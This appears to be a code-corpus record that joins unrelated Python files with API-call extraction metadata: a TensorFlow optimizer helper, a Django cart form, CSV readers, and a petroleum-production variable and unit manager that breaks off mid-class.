"pygame.event.get",
"ui.input.control.open_setting",
"ui.input.control.play_favourite",
"ui.input.control.scroll_menu_down",
"ui.input.control.central_button",
"ui.input.control.back",
"sys.exit",
"ui.input.control.switch_led",
"ui.input.control.scroll_menu_up"
] |
[((174, 188), 'pygame.event.get', 'pg.event.get', ([], {}), '()\n', (186, 188), True, 'import pygame as pg\n'), ((131, 140), 'pygame.quit', 'pg.quit', ([], {}), '()\n', (138, 140), True, 'import pygame as pg\n'), ((149, 159), 'sys.exit', 'sys.exit', ([], {}), '()\n', (157, 159), False, 'import sys\n'), ((439, 476), 'ui.input.control.central_button', 'control.central_button', (['window', 'state'], {}), '(window, state)\n', (461, 476), False, 'from ui.input import control\n'), ((553, 590), 'ui.input.control.scroll_menu_up', 'control.scroll_menu_up', (['window', 'state'], {}), '(window, state)\n', (575, 590), False, 'from ui.input import control\n'), ((669, 708), 'ui.input.control.scroll_menu_down', 'control.scroll_menu_down', (['window', 'state'], {}), '(window, state)\n', (693, 708), False, 'from ui.input import control\n'), ((785, 812), 'ui.input.control.back', 'control.back', (['window', 'state'], {}), '(window, state)\n', (797, 812), False, 'from ui.input import control\n'), ((888, 923), 'ui.input.control.switch_audio', 'control.switch_audio', (['window', 'state'], {}), '(window, state)\n', (908, 923), False, 'from ui.input import control\n'), ((999, 1032), 'ui.input.control.switch_led', 'control.switch_led', (['window', 'state'], {}), '(window, state)\n', (1017, 1032), False, 'from ui.input import control\n'), ((1108, 1143), 'ui.input.control.open_setting', 'control.open_setting', (['window', 'state'], {}), '(window, state)\n', (1128, 1143), False, 'from ui.input import control\n'), ((1220, 1260), 'ui.input.control.play_favourite', 'control.play_favourite', (['window', 'state', '(1)'], {}), '(window, state, 1)\n', (1242, 1260), False, 'from ui.input import control\n'), ((1336, 1376), 'ui.input.control.play_favourite', 'control.play_favourite', (['window', 'state', '(2)'], {}), '(window, state, 2)\n', (1358, 1376), False, 'from ui.input import control\n'), ((1452, 1492), 'ui.input.control.play_favourite', 'control.play_favourite', (['window', 'state', '(3)'], {}), '(window, state, 3)\n', (1474, 1492), False, 'from ui.input import control\n'), ((1568, 1608), 'ui.input.control.play_favourite', 'control.play_favourite', (['window', 'state', '(4)'], {}), '(window, state, 4)\n', (1590, 1608), False, 'from ui.input import control\n'), ((1684, 1724), 'ui.input.control.play_favourite', 'control.play_favourite', (['window', 'state', '(5)'], {}), '(window, state, 5)\n', (1706, 1724), False, 'from ui.input import control\n'), ((1800, 1840), 'ui.input.control.play_favourite', 'control.play_favourite', (['window', 'state', '(6)'], {}), '(window, state, 6)\n', (1822, 1840), False, 'from ui.input import control\n'), ((1916, 1956), 'ui.input.control.play_favourite', 'control.play_favourite', (['window', 'state', '(7)'], {}), '(window, state, 7)\n', (1938, 1956), False, 'from ui.input import control\n')]
|
# -*- coding:utf-8 -*-
# Author: hankcs
# Date: 2019-11-11 18:44
import tensorflow as tf
from elit.optimizers.adamw.optimization import WarmUp, AdamWeightDecay
# from elit.optimization.adamw.optimizers_v2 import AdamW
# from elit.optimization.adamw.utils import get_weight_decays
# def create_optimizer(model, init_lr, num_train_steps, num_warmup_steps):
# """Creates an optimizer with learning rate schedule."""
# wd_dict = get_weight_decays(model)
#
# # Implements linear decay of the learning rate.
# learning_rate_fn = tf.keras.optimizers.schedules.PolynomialDecay(
# initial_learning_rate=init_lr,
# decay_steps=num_train_steps,
# end_learning_rate=0.0)
# if num_warmup_steps:
# learning_rate_fn = WarmUp(initial_learning_rate=init_lr,
# decay_schedule_fn=learning_rate_fn,
# warmup_steps=num_warmup_steps)
# optimizer = AdamW(
# learning_rate=learning_rate_fn,
# weight_decay_rate=0.01,
# beta_1=0.9,
# beta_2=0.999,
# epsilon=1e-6,
# exclude_from_weight_decay=['layer_norm', 'bias'])
# return optimizer
def create_optimizer(init_lr, num_train_steps, num_warmup_steps, weight_decay_rate=0.01, epsilon=1e-6, clipnorm=None):
"""Creates an optimizer with learning rate schedule.
Args:
init_lr:
num_train_steps:
num_warmup_steps:
weight_decay_rate: (Default value = 0.01)
epsilon: (Default value = 1e-6)
clipnorm: (Default value = None)
Returns:
"""
# Implements linear decay of the learning rate.
learning_rate_fn = tf.keras.optimizers.schedules.PolynomialDecay(
initial_learning_rate=init_lr,
decay_steps=num_train_steps,
end_learning_rate=0.0)
if num_warmup_steps:
learning_rate_fn = WarmUp(initial_learning_rate=init_lr,
decay_schedule_fn=learning_rate_fn,
warmup_steps=num_warmup_steps)
additional_args = {}
if clipnorm:
additional_args['clipnorm'] = clipnorm
optimizer = AdamWeightDecay(
learning_rate=learning_rate_fn,
weight_decay_rate=weight_decay_rate,
beta_1=0.9,
beta_2=0.999,
epsilon=epsilon,
exclude_from_weight_decay=['LayerNorm', 'bias'],
**additional_args
)
# {'LayerNorm/gamma:0', 'LayerNorm/beta:0'}
return optimizer
|
[
"elit.optimizers.adamw.optimization.AdamWeightDecay",
"elit.optimizers.adamw.optimization.WarmUp",
"tensorflow.keras.optimizers.schedules.PolynomialDecay"
] |
[((1670, 1802), 'tensorflow.keras.optimizers.schedules.PolynomialDecay', 'tf.keras.optimizers.schedules.PolynomialDecay', ([], {'initial_learning_rate': 'init_lr', 'decay_steps': 'num_train_steps', 'end_learning_rate': '(0.0)'}), '(initial_learning_rate=init_lr,\n decay_steps=num_train_steps, end_learning_rate=0.0)\n', (1715, 1802), True, 'import tensorflow as tf\n'), ((2154, 2358), 'elit.optimizers.adamw.optimization.AdamWeightDecay', 'AdamWeightDecay', ([], {'learning_rate': 'learning_rate_fn', 'weight_decay_rate': 'weight_decay_rate', 'beta_1': '(0.9)', 'beta_2': '(0.999)', 'epsilon': 'epsilon', 'exclude_from_weight_decay': "['LayerNorm', 'bias']"}), "(learning_rate=learning_rate_fn, weight_decay_rate=\n weight_decay_rate, beta_1=0.9, beta_2=0.999, epsilon=epsilon,\n exclude_from_weight_decay=['LayerNorm', 'bias'], **additional_args)\n", (2169, 2358), False, 'from elit.optimizers.adamw.optimization import WarmUp, AdamWeightDecay\n'), ((1876, 1984), 'elit.optimizers.adamw.optimization.WarmUp', 'WarmUp', ([], {'initial_learning_rate': 'init_lr', 'decay_schedule_fn': 'learning_rate_fn', 'warmup_steps': 'num_warmup_steps'}), '(initial_learning_rate=init_lr, decay_schedule_fn=learning_rate_fn,\n warmup_steps=num_warmup_steps)\n', (1882, 1984), False, 'from elit.optimizers.adamw.optimization import WarmUp, AdamWeightDecay\n')]
|
from django import forms
from crispy_forms.helper import FormHelper
from crispy_forms.layout import (
Column,
HTML,
Field,
Fieldset,
Layout,
Row,
Submit,
BaseInput,
)
from crispy_forms.bootstrap import InlineField, UneditableField
from crispy_forms import layout
PRODUCT_QUANTITY_CHOICES = [(i, str(i)) for i in range(1, 200)]
class CartAddProductForm(forms.Form):
quantity = forms.TypedChoiceField(
choices=PRODUCT_QUANTITY_CHOICES,
coerce=int,
required=False,
widget=forms.TextInput(attrs={'class': 'qty', 'style':'width:60px; padding: 8.7px;'})
)
update = forms.BooleanField(
widget=forms.HiddenInput(), initial=False, required=False
)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.layout = Layout(
BaseInput("quantity", value=1, style="width:50px;", add_class="qty"),
Submit("Add To Cart", "Add to Cart", css_class="add-to-cart button m-0"),
)
# class ListCartAddProductForm(forms.Form):
# quantity = forms.TypedChoiceField(
# choices=PRODUCT_QUANTITY_CHOICES,
# coerce=int,
# required=False,
# widget=forms.TextInput(attrs={'class': 'qty', 'style':'width:60px; padding: 8.7px;'})
# )
# update = forms.BooleanField(
# widget=forms.HiddenInput(), initial=False, required=False
# )
# def __init__(self, *args, **kwargs):
# super().__init__(*args, **kwargs)
# self.helper = FormHelper()
# self.helper.layout = Layout(
# BaseInput("quantity", value=1, style="width:50px;", add_class="qty"),
# Submit("Add To Cart", "Add To Cart", css_class="add-to-cart button m-0"),
# )
# <i class="icon-shopping-cart"></i>
|
[
"crispy_forms.layout.BaseInput",
"crispy_forms.helper.FormHelper",
"django.forms.TextInput",
"django.forms.HiddenInput",
"crispy_forms.layout.Submit"
] |
[((837, 849), 'crispy_forms.helper.FormHelper', 'FormHelper', ([], {}), '()\n', (847, 849), False, 'from crispy_forms.helper import FormHelper\n'), ((541, 620), 'django.forms.TextInput', 'forms.TextInput', ([], {'attrs': "{'class': 'qty', 'style': 'width:60px; padding: 8.7px;'}"}), "(attrs={'class': 'qty', 'style': 'width:60px; padding: 8.7px;'})\n", (556, 620), False, 'from django import forms\n'), ((674, 693), 'django.forms.HiddenInput', 'forms.HiddenInput', ([], {}), '()\n', (691, 693), False, 'from django import forms\n'), ((899, 967), 'crispy_forms.layout.BaseInput', 'BaseInput', (['"""quantity"""'], {'value': '(1)', 'style': '"""width:50px;"""', 'add_class': '"""qty"""'}), "('quantity', value=1, style='width:50px;', add_class='qty')\n", (908, 967), False, 'from crispy_forms.layout import Column, HTML, Field, Fieldset, Layout, Row, Submit, BaseInput\n'), ((981, 1053), 'crispy_forms.layout.Submit', 'Submit', (['"""Add To Cart"""', '"""Add to Cart"""'], {'css_class': '"""add-to-cart button m-0"""'}), "('Add To Cart', 'Add to Cart', css_class='add-to-cart button m-0')\n", (987, 1053), False, 'from crispy_forms.layout import Column, HTML, Field, Fieldset, Layout, Row, Submit, BaseInput\n')]
|
"""This module contains boilerplate csv helpers."""
import csv
def read_csv(filename):
"""Read a CSV file.
**Example**:
>>> read_csv('/path/to/data.csv')
[{ 'name': 'foo' }]
:param filename:
Path to CSV file.
:return:
A Python representation of the CSV document.
"""
with open(filename) as fh:
field_names = (
fh.readline().replace('"', "").replace("\n", "").split(",")
)
dict_reader = csv.DictReader(fh, fieldnames=field_names)
return list(dict(row) for row in dict_reader)
def iter_csv(filename):
"""Iterate a CSV file.
**Example**:
>>> for item in iter_csv('/path/to/data.csv'):
... print(item)
[{ 'name': 'foo' }]
:param filename:
Path to CSV file.
:yield:
A Python ``dict`` representation of a CSV row.
"""
with open(filename) as fh:
field_names = (
fh.readline().replace('"', "").replace("\n", "").split(",")
)
dict_reader = csv.DictReader(fh, fieldnames=field_names)
for row in dict_reader:
yield dict(row)
|
[
"csv.DictReader"
] |
[((475, 517), 'csv.DictReader', 'csv.DictReader', (['fh'], {'fieldnames': 'field_names'}), '(fh, fieldnames=field_names)\n', (489, 517), False, 'import csv\n'), ((1025, 1067), 'csv.DictReader', 'csv.DictReader', (['fh'], {'fieldnames': 'field_names'}), '(fh, fieldnames=field_names)\n', (1039, 1067), False, 'import csv\n')]
|
from datetime import date
import numpy as np
from matplotlib.lines import Line2D
from _ids import *
import _icons as ico
from utilities import pydate2wxdate, wxdate2pydate, GetAttributes
from properties import SummaryProperty
class VariableManager:
def __init__(self, unit_system):
# simulation dependent -----------------------------------------------------------------------------------------
# times
self._time = Time()
self._date = Date()
# potentials
self._oil_potential = OilPotential(unit_system)
self._gas_potential = GasPotential(unit_system)
self._water_potential = WaterPotential(unit_system)
self._liquid_potential = LiquidPotential(unit_system)
self._lift_gas_potential = LiftGasPotential(unit_system)
self._gas_injection_potential = GasInjectionPotential(unit_system)
self._water_injection_potential = WaterInjectionPotential(unit_system)
self._total_gas_potential = TotalGasPotential(unit_system)
# rates
self._oil_rate = OilRate(unit_system)
self._gas_rate = GasRate(unit_system)
self._water_rate = WaterRate(unit_system)
self._liquid_rate = LiquidRate(unit_system)
self._lift_gas_rate = LiftGasRate(unit_system)
self._gas_injection_rate = GasInjectionRate(unit_system)
self._water_injection_rate = WaterInjectionRate(unit_system)
self._total_gas_rate = TotalGasRate(unit_system)
# cumulatives
self._oil_cumulative = OilCumulative(unit_system)
self._gas_cumulative = GasCumulative(unit_system)
self._water_cumulative = WaterCumulative(unit_system)
self._liquid_cumulative = LiquidCumulative(unit_system)
self._lift_gas_cumulative = LiftGasCumulative(unit_system)
self._gas_injection_cumulative = GasInjectionCumulative(unit_system)
self._water_injection_cumulative = WaterInjectionCumulative(unit_system)
self._total_gas_cumulative = TotalGasCumulative(unit_system)
# ratios
self._water_cut = WaterCut(unit_system)
self._oil_cut = OilCut(unit_system)
self._gas_oil_ratio = GasOilRatio(unit_system)
self._water_oil_ratio = WaterOilRatio(unit_system)
self._gas_liquid_ratio = GasLiquidRatio(unit_system)
self._water_gas_ratio = WaterGasRatio(unit_system)
self._oil_gas_ratio = OilGasRatio(unit_system)
self._total_gas_liquid_ratio = TotalGasLiquidRatio(unit_system)
self._production_uptime = ProductionUptime(unit_system)
self._lift_gas_uptime = LiftGasUptime(unit_system)
self._gas_injection_uptime = GasInjectionUptime(unit_system)
self._water_injection_uptime = WaterInjectionUptime(unit_system)
# user-defined summary variables
self._summaries = {}
# non-simulation dependent -------------------------------------------------------------------------------------
# wells
self._well_spacing = WellSpacing(unit_system)
# reservoir fluids
self._bo = OilFVF(unit_system)
self._bg = GasFVF(unit_system)
self._bw = WaterFVF(unit_system)
self._rs = SolutionGasOilRatio(unit_system)
# injection fluids
self._bg_inj = InjectionGasFVF(unit_system)
self._bw_inj = InjectionWaterFVF(unit_system)
# facilities
self._availability = Availability(unit_system)
self._tglr = TargetGasLiquidRatio(unit_system)
self._wag_cycle = WAGCycleDuration(unit_system)
self._wag_cycles = WAGCycles(unit_system)
self._voidage_ratio = TargetVoidageRatio(unit_system)
# constraints
self._oil_constraint = OilConstraint(unit_system)
self._gas_constraint = GasConstraint(unit_system)
self._water_constraint = WaterConstraint(unit_system)
self._liquid_constraint = LiquidConstraint(unit_system)
self._gas_inj_constraint = InjectionGasConstraint(unit_system)
self._water_inj_constraint = InjectionWaterConstraint(unit_system)
self._gas_lift_constraint = LiftGasConstraint(unit_system)
# volumes
self._stoiip = STOIIP(unit_system)
# risking
self._maturity = Maturity(unit_system)
self._pos = ProbabilityOfSuccess(unit_system)
# scalers
self._s_cum = CumulativeScaler(unit_system)
self._s_rate = RateScaler(unit_system)
self._s_ffw = FFWScaler(unit_system)
self._s_ffg = FFGScaler(unit_system)
self._onset = OnsetScaler(unit_system)
self._wct_ini = InitialWCTScaler(unit_system)
# statics TODO: Change to a dictionary and let user fill with only useful parameters
self._length = CompletedLength(unit_system)
self._hcft = HydrocarbonFeet(unit_system)
self._hcpv = HydrocarbonPoreVolume(unit_system)
self._permeability = Permeability(unit_system)
self._oil_density = OilDensity(unit_system)
# correlation matrix for the scalers and static parameters -----------------------------------------------------
self._correlation_labels = []
self._correlation_matrix = []
self.InitialiseCorrelationMatrix()
def AddCorrelation(self, variable):
if self._correlation_matrix:
for row in self._correlation_matrix:
row.append(0.)
self._correlation_matrix.append([0.] * (len(self._correlation_matrix) + 1))
self._correlation_matrix[-1][-1] = 1.
self._correlation_labels.append(variable.GetMenuLabel())
def AddSummary(self, summary):
id_ = self.GetUniqueSummaryId()
summary.SetId(id_)
self._summaries[id_] = summary
def DeleteSummary(self, id_):
del self._summaries[id_]
def Get(self, type_, id_=None):
if id_ is None:
return list(getattr(self, '_{}'.format(type_)).values())
else:
return getattr(self, '_{}'.format(type_))[id_]
def GetAllVariables(self):
return GetAttributes(self, exclude=('_correlation_labels', '_correlation_matrix'), sort=True)
def GetCorrelationMatrix(self):
return self._correlation_matrix, self._correlation_labels
def GetSummaries(self):
return self._summaries.values()
def GetVariable(self, id_):
attr = '_{}'.format(id_)
if hasattr(self, attr):
return getattr(self, attr)
else:
return self._summaries[id_]
def GetVariables(self, ids):
return [self.GetVariable(id_) for id_ in ids]
def GetUniqueSummaryId(self):
ids = self._summaries.keys()
if not ids:
return 0
else:
return max(ids) + 1
def InitialiseCorrelationMatrix(self):
attrs = GetAttributes(self, exclude=('_summaries', '_correlation_labels', '_correlation_matrix'), attr_only=True, sort=True)
for attr in attrs:
if attr.IsStatic() or attr.IsScaler():
self.AddCorrelation(attr)
def SetCorrelationMatrix(self, correlation_matrix):
self._correlation_matrix = correlation_matrix
# ======================================================================================================================
# Generic Variables
# ======================================================================================================================
class Variable:
def __init__(self):
self._unit = None # subclass of class Unit
self._frame_label = None # label shown on wx.Frames
self._menu_label = None # label shown in treectrls
self._image = None # PyEmbeddedImage shown in trees, etc.
self._choices = None # list of strings, which can be given as input to wx.Choice, etc.
self._choice_images = None # list of PyEmbeddedImage which can be passed to bitmapcombobox
self._client_data_map = None # dictionary of client_data for each index in bitmapcombobox
self._limits = (None, None) # limiting values for input and on plot axis'
# plot options
self._line_options = None # class of LineOptions
self._fitted_options = None # class of FittedDataOptions
self._legend = None # string, used for bar and bubble charts
# axis options (plotting)
self._plot_label = None # label shown in Matplotlib plots
self._is_date = False # required for plotting of dates
# to and from Frame options
self._round_off = None # round-off used for wx.Frame displays of variables (if pytype is float)
self._pytype = None # python-type
# tooltip
self._tooltip = None # str, tooltip to be displayed on hover
# variable management
self._type = None # str
self._id = None # str, allows access to variable_mgr via getattr(self, id_)
self._type_id = None # int, id to test against
self._image_key = None
def FromFrame(self, value):
if self._pytype is not str and value == '':
return None
elif self._pytype is bool:
return value
elif self._pytype is float:
return float(value)
elif self._pytype is int:
return int(value)
elif self._pytype is date:
return wxdate2pydate(value)
elif self._pytype is str:
return str(value)
elif (self._pytype is list) or (self._pytype is tuple):
if value == -1: # default selection in a combobox/choice
return None
else:
return value
elif self._pytype is Pointer:
return value
elif self._pytype is Index:
return value
elif self._pytype is wx.Colour:
return value
def GetAttribute(self):
return '_{}'.format(self._type)
def GetBitmap(self):
if self._image is not None:
return self._image.GetBitmap()
else:
return wx.NullBitmap
def GetImage(self):
return self._image
def GetChoices(self, idx=None):
if idx is None:
return [choice if choice is not None else '' for choice in self._choices]
else:
return self._choices[idx]
def GetChoiceBitmaps(self):
return [image.GetBitmap() if (image is not None) else wx.NullBitmap for image in self._choice_images]
def GetClientDataMap(self):
return self._client_data_map
def GetComboLabel(self):
return self._frame_label
def GetFittedOptions(self):
return self._fitted_options
def GetFrameLabel(self, idx=None):
if isinstance(self._frame_label, tuple) and idx is None:
return ('{}:'.format(l) for l in self._frame_label)
if idx is None:
if self._frame_label is None:
return None
label = self._frame_label
else:
if self._frame_label[idx] is None:
return None
label = self._frame_label[idx]
return '{}:'.format(label)
def GetId(self):
return self._id
def GetImageKey(self):
return self._image_key
def GetLabel(self):
return self._frame_label
def GetLegend(self):
return self._legend
def GetLimits(self):
return self._limits
def GetLineOptions(self):
return self._line_options
def GetMenuLabel(self):
return self._menu_label
def GetPlotLabel(self):
return self._line_options.GetLabel()
def GetToolTip(self):
return self._tooltip
def GetType(self):
return self._type
def GetTypeId(self):
return self._type_id
def GetUnit(self, idx=None):
if idx is None:
unit = self._unit
else:
unit = self._unit[idx]
if unit is None or isinstance(unit, str) or isinstance(unit, tuple):
return unit
else:
return unit.Get()
def GetUnitClass(self):
return self._unit
def GetXLabel(self):
unit = self._unit.Get()
if unit:
if ('^' in unit) or ('_' in unit):
return r'{} [${}$]'.format(self._plot_label, unit)
else:
return r'{} [{}]'.format(self._plot_label, unit)
else:
return r'{}'.format(self._plot_label)
def GetYLabel(self, group_units=False):
if group_units:
label = self._unit.GetLabel()
else:
label = self._plot_label
unit = self._unit.Get()
if ('^' in unit) or ('_' in unit):
unit_label = r'[${}$]'.format(unit)
elif unit == '':
unit_label = r'[-]'
else:
unit_label = r'[{}]'.format(unit)
return r'{} {}'.format(label, unit_label)
def IsDate(self):
return self._is_date
def IsScaler(self):
return self.IsType('scalers')
def IsStatic(self):
return self.IsType('statics')
def IsSummary(self):
return self.IsType('summaries')
def IsType(self, type_):
return self._type == type_
def SetBitmap(self, bitmap):
self._bitmap = bitmap
def SetImage(self, image_key=None):
self._image_key = self._id
def SetUnit(self, unit_system):
pass
def SetUnitClass(self, unit_class):
self._unit = unit_class
def ToFrame(self, value):
if ((self._pytype is float) or (self._pytype is int)) and value is None:
return ''
elif self._pytype is bool:
return value
elif self._pytype is float:
return str(round(value, self._round_off))
elif self._pytype is int:
return str(value)
elif self._pytype is date:
if value is None: # occurs on first load
return wx.DateTime.Now()
else:
return pydate2wxdate(value)
elif self._pytype is str:
if value is None:
return ''
else:
return str(value)
elif (self._pytype is list) or (self._pytype is tuple):
if value is None: # default selection in a combobox/choice
return -1
else:
return value
elif self._pytype is Pointer:
return value
elif self._pytype is Index:
if value is None: # default selection in a RadioBoxes
return 0
else:
return value
elif self._pytype is wx.Colour:
return value
class VariableCollection:
def __init__(self, *variables):
self._variables = []
self.AddVariables(*variables)
def AddVariable(self, variable):
self._variables.append(variable)
def AddVariables(self, *variables):
for variable in variables:
self.AddVariable(variable)
def GetChoiceBitmaps(self):
return [v.GetBitmap() for v in self._variables]
def GetChoices(self):
return [v.GetComboLabel() for v in self._variables]
def GetFrameLabel(self, idx=None):
if idx is None:
return [v.GetFrameLabel() for v in self._variables]
else:
return self._variables[idx].GetFrameLabel()
def GetUnit(self, idx=None):
if idx is None:
return [v.GetUnit() for v in self._variables]
else:
return self._variables[idx].GetUnit()
def GetVariables(self):
return self._variables
class Summary(Variable):
def __init__(self):
super().__init__()
self._image_key = None
self._properties = SummaryProperty() # similar to what Entities have
self._type = 'summaries'
self._type_id = ID_SUMMARY
def Calculate(self, profile, *args):
return self._properties.Calculate(profile, *args)
def GetImageKey(self):
return self._image_key
def GetProperties(self):
return self._properties
def ReplaceInformation(self, variable, image):
self._image = image
self._unit = variable.GetUnitClass()
self._properties = variable.GetProperties()
self._menu_label = variable.GetMenuLabel()
self._plot_label = variable.GetMenuLabel()
self._legend = variable.GetMenuLabel()
def SetId(self, id_):
self._id = id_
def SetImage(self, image_key=None):
self._image_key = image_key
self._image = image_key
def SetLabels(self, label):
self._menu_label = label
self._plot_label = label
self._legend = label
# ======================================================================================================================
# Types used to test against in ToFrame and FromFrame
# ======================================================================================================================
class Pointer:
"""
Used for controls that allow insert via an arrow or other means
"""
def __init__(self):
pass
class Index:
"""
Used for transfer to and from RadioBox (which requires 0 as default, unlike bitmapcombobox which requires -1)
"""
def __init__(self):
pass
# ======================================================================================================================
# Plotting options for plotable variables
# ======================================================================================================================
class LineOptions:
def __init__(self, alpha=None, colour=None, drawstyle='default', fillstyle=None, label=None, linestyle='-',
linewidth=None, marker=None, markersize=None):
self._alpha = alpha # double, [0, 1]
self._colour = colour # (R, G, B) normalized to [0, 1]
self._drawstyle = drawstyle # 'default', 'steps-{pre, mid, post}'
self._fillstyle = fillstyle # 'full', 'none' (additional options available)
self._label = label # string
self._linestyle = linestyle # '-', '--', '-.', ':'
self._linewidth = linewidth # int, primarily set through settings
self._marker = marker # see matplotlib documentation
self._markersize = markersize # int, primarily set through settings
self._picker = 7 # sensitivity to click-events
def Get(self):
# returns all options as **kwargs input to a matplotlib axes.plot function
return {'alpha': self._alpha,
'color': self._colour,
'drawstyle': self._drawstyle,
'fillstyle': self._fillstyle,
'label': self._label,
'linestyle': self._linestyle,
'linewidth': self._linewidth,
'marker': self._marker,
'markersize': self._markersize,
'picker': self._picker}
def GetAlpha(self):
return self._alpha
def GetColour(self):
return self._colour
def GetDrawstyle(self):
"""
Used for transfer to frame
:return:
"""
if self._drawstyle is None:
return -1
elif self._drawstyle == 'default':
return 0
elif self._drawstyle == 'steps-pre':
return 1
elif self._drawstyle == 'steps-mid':
return 2
elif self._drawstyle == 'steps-post':
return 3
def GetLabel(self):
return self._label
def GetLegend(self):
return Line2D([], [], **self.Get())
def GetLinestyle(self):
"""
Used for transfer to frame
:return:
"""
if self._linestyle is None:
return -1
elif self._linestyle == '-':
return 0
elif self._linestyle == '--':
return 1
elif self._linestyle == '-.':
return 2
elif self._linestyle == ':':
return 3
def SetAlpha(self, alpha):
self._alpha = alpha
def SetColour(self, colour):
self._colour = colour
def SetDrawstyle(self, drawstyle):
"""
Used for transfer from frame
:param drawstyle: int, BitmapComboBox index
:return:
"""
if drawstyle == -1:
self._drawstyle = None
elif drawstyle == 0:
self._drawstyle = 'default'
elif drawstyle == 1:
self._drawstyle = 'steps-pre'
elif drawstyle == 2:
self._drawstyle = 'steps-mid'
elif drawstyle == 3:
self._drawstyle = 'steps-post'
def SetFillstyle(self, fillstyle):
self._fillstyle = fillstyle
def SetLabel(self, label):
self._label = label
def SetLinestyle(self, linestyle):
"""
Used for transfer from frame
:param drawstyle: int, BitmapComboBox index
:return:
"""
if linestyle == -1:
self._linestyle = None
elif linestyle == 0:
self._linestyle = '-'
elif linestyle == 1:
self._linestyle = '--'
elif linestyle == 2:
self._linestyle = '-.'
elif linestyle == 3:
self._linestyle = ':'
def SetLinewidth(self, linewidth):
self._linewidth = linewidth
def SetMarker(self, marker):
self._marker = marker
def SetMarkerSize(self, markersize):
self._markersize = markersize
def Highlight(self):
if self._markersize > 0:
self._markersize += 2
else:
self._linewidth += 2
def UnHighlight(self):
if self._markersize > 0:
self._markersize -= 2
else:
self._linewidth -= 2
class FittedDataOptions(LineOptions):
def __init__(self, colour=None):
super().__init__()
self._colour = colour
self._label = 'Fitted data'
self._fillstyle = 'none'
self._linewidth = 0.
self._marker = 'o'
# ======================================================================================================================
# Units
# ======================================================================================================================
class Unit:
def __init__(self, unit_system=None):
self._unit = None
self._label = None # used as label in plotting when units are grouped
def Get(self):
return self._unit
def GetLabel(self):
return self._label
def Set(self, unit_system):
# sub-class
pass
class TimeUnit(Unit):
def __init__(self, unit='days', unit_system=None):
super().__init__()
self._unit = unit
class DateUnit(Unit):
def __init__(self, unit_system=None):
super().__init__()
self._unit = '-'
class LiquidFlowRateUnit(Unit):
def __init__(self, unit_system):
super().__init__()
self._label = 'Liquid Flow Rate'
self.Set(unit_system)
def Set(self, unit_system):
if unit_system == ID_UNIT_FIELD:
self._unit = 'Mstb/day'
else: # metric
self._unit = 'm^{3}/day'
class GasFlowRateUnit(Unit):
def __init__(self, unit_system):
super().__init__()
self._label = 'Gas Flow Rate'
self.Set(unit_system)
def Set(self, unit_system):
if unit_system == ID_UNIT_FIELD:
self._unit = 'MMscf/day'
else: # metric
self._unit = 'm^{3}/day'
class LiquidVolumeUnit(Unit):
def __init__(self, unit_system):
super().__init__()
self._label = 'Liquid Volume'
self.Set(unit_system)
def Set(self, unit_system):
if unit_system == ID_UNIT_FIELD:
self._unit = 'MMstb'
else: # metric
self._unit = 'km^{3}'
class GasVolumeUnit(Unit):
def __init__(self, unit_system):
super().__init__()
self._label = 'Gas Volume'
self.Set(unit_system)
def Set(self, unit_system):
if unit_system == ID_UNIT_FIELD:
self._unit = 'Bscf'
else: # metric
self._unit = 'km^{3}'
class GasLiquidRatioUnit(Unit):
def __init__(self, unit_system):
super().__init__()
self._label = 'Gas-Liquid Ratio'
self.Set(unit_system)
def Set(self, unit_system):
if unit_system == ID_UNIT_FIELD:
self._unit = 'Mscf/stb'
else: # metric
self._unit = 'sm^{3}/sm^{3}'
class LiquidGasRatioUnit(Unit):
def __init__(self, unit_system):
super().__init__()
self._label = 'Liquid-Gas Ratio'
self.Set(unit_system)
def Set(self, unit_system):
if unit_system == ID_UNIT_FIELD:
self._unit = 'stb/Mscf'
else: # metric
self._unit = 'sm^{3}/sm^{3}'
class LiquidLiquidRatioUnit(Unit):
def __init__(self, unit_system):
super().__init__()
self._label = 'Liquid-Liquid Ratio'
self.Set(unit_system)
def Set(self, unit_system):
if unit_system == ID_UNIT_FIELD:
self._unit = 'stb/stb'
else: # metric
self._unit = 'sm^{3}/sm^{3}'
class LiquidVolumeRatio(Unit):
def __init__(self, unit_system):
super().__init__()
self._label = 'Liquid Volume Ratio'
self.Set(unit_system)
def Set(self, unit_system):
if unit_system == ID_UNIT_FIELD:
self._unit = 'rb/stb'
else: # metric
self._unit = 'rm^{3}/sm^{3}'
class GasVolumeRatio(Unit):
def __init__(self, unit_system):
super().__init__()
self._label = 'Gas Volume Ratio'
self.Set(unit_system)
def Set(self, unit_system):
if unit_system == ID_UNIT_FIELD:
self._unit = 'rb/Mscf'
else: # metric
self._unit = 'rm^{3}/sm^{3}'
class ReservoirVolumeRatio(Unit):
def __init__(self, unit_system):
super().__init__()
self._label = 'Reservoir Volume Ratio'
self.Set(unit_system)
def Set(self, unit_system):
if unit_system == ID_UNIT_FIELD:
self._unit = 'rb/rb'
else: # metric
self._unit = 'rm^{3}/rm^{3}'
class LengthUnit(Unit):
def __init__(self, unit_system):
super().__init__()
self._label = 'Length'
self.Set(unit_system)
def Set(self, unit_system):
if unit_system == ID_UNIT_FIELD:
self._unit = 'ft'
else: # metric
self._unit = 'm'
class AreaUnit(Unit):
def __init__(self, unit_system):
super().__init__()
self._label = 'Area'
self.Set(unit_system)
def Set(self, unit_system):
if unit_system == ID_UNIT_FIELD:
self._unit = 'ft^{2}'
else: # metric
self._unit = 'm^{2}'
class VolumeUnit(Unit):
def __init__(self, unit_system):
super().__init__()
self._label = 'Volume'
self.Set(unit_system)
def Set(self, unit_system):
if unit_system == ID_UNIT_FIELD:
self._unit = 'stb'
else: # metric
self._unit = 'm^{3}'
class PermeabilityUnit(Unit):
def __init__(self, unit_system=None):
super().__init__()
self._label = 'Permeability'
self._unit = 'mD'
class DensityUnit(Unit):
def __init__(self, unit_system):
super().__init__()
self._label = 'Density'
self.Set(unit_system)
def Set(self, unit_system):
if unit_system == ID_UNIT_FIELD:
self._unit = '^{o}API'
else: # metric
self._unit = 'kg/m^{3}'
class FractionUnit(Unit):
def __init__(self, unit_system=None):
super().__init__()
self._label = 'Fraction'
self._unit = '-'
class PercentageUnit(Unit):
def __init__(self, unit_system=None):
super().__init__()
self._label = 'Percentage'
self._unit = '%'
class AmountUnit(Unit):
def __init__(self, unit_system=None):
super().__init__()
self._label = 'Amount'
self._unit = ''
class Unitless(Unit):
def __init__(self, unit_system=None):
super().__init__()
self._label = 'Dimensionless'
self._unit = ''
# ======================================================================================================================
# Time Variables
# ======================================================================================================================
class DurationVariable(Variable):
def __init__(self):
super().__init__()
self._type = 'durations'
class Time(DurationVariable):
